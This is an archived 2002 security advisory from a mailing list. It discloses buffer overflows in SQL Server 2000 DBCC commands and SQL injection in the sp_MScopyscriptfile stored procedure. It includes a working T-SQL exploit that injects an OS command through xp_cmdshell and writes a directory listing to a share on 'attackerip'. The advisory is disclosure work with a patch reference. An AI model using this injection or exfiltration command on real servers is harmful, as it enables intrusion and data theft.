lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20020725234408.8641.qmail@web40006.mail.yahoo.com>
From: cesarc56 at yahoo.com (c c)
Subject: SQL Server 2000 Buffer Overflows and SQL Inyection vulnerabilities.

Security Advisory

Name:    SQL Server 2000 Buffer Overflows and SQL
Inyection vulnerabilities.
System Affected :    Sql Server 2000 all Service
Packs.
Severity :    High.
Author:    Cesar Cerrudo.
Date:    07/25/2002 
Advisory Number:    CC070205

Overview:
Database Consistency Checkers (DBCCs) are command
console utilities that allow maintenance and other
operations to be performed on a SQL Server, some of
the DBCC functions are vulnerable to buffer overflows.
The explotation of these vulnerabilities could enable
an attacker to run code in the context of the SQL
Server service.
Some stored procedures used in database replication
are vulnerable to SQL injection. The explotation of
these vulnerabilities could enable an attacker to run
OS commands with xp_cmdshell in the context of the SQL
Server Agent Proxy account.

Details:

The following DBCC funcions contain unchecked buffers:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b) 
DBCC UPDATEUSAGE ('','XXX...') (c) 
DBCC CHECKCONSTRAINTS ('XXX...') (c) 
DBCC SHOWCONTIG ('XXX...') (d) 
DBCC CLEANTABLE ('','XXX...') (d)
(a) Only members of sysadmin fixed server role can run
this command.
(b) Only members of sysadmin fixed server role,
db_owner or db_ddladmin fixed database role can run
this command.
(c) Only members of sysadmin fixed server role or
db_owner fixed database role can run this command.
(d) All users can run this command.
The buffer overflow in DBCC ADDEXTENDEDPROC affects
SQL Server 7.0 too.


Sp_MScopyscriptfile stored procedure is one of several
stored procedures (not mentioned here for time
reasons) vulnerables to SQL Inyection.
Sp_MScopyscriptfile create a directory in the SQL
Server replication directory and then copy a script
file into it. It has one input parameter @scriptfile
that is the name of the script file to be copied. In
that parameter OS commands can be inyected and then
executed by xp_cmdshell.

---Code snip of sp_MScopyscriptfile stored procedure
where the inyection ocurrs---

select @cmd = N'copy "' + @scriptfile + N'" "' +
@directory + N'"'
exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT

----End code snip-----

SQL Server Agent Proxy account must be enabled to
succesfull exploit these SQL Inyection vulnerabilities
and is not enabled by default.

Exploit :

declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "' 
exec sp_MScopyscriptfile @scripfile ,''


More Details:
http://www.appsecinc.com/resources/alerts/mssql/02-0011.html

Vendor Status :
Microsoft was contacted, we work together and
Microsoft release a fix.

Patch Available : 
http://www.microsoft.com/technet/security/bulletin/MS02-038.asp

Thanks!: 
Special thanks to Aaron Newman (Application Security,
Inc.) for his
collaboration in testing.


__________________________________________________
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ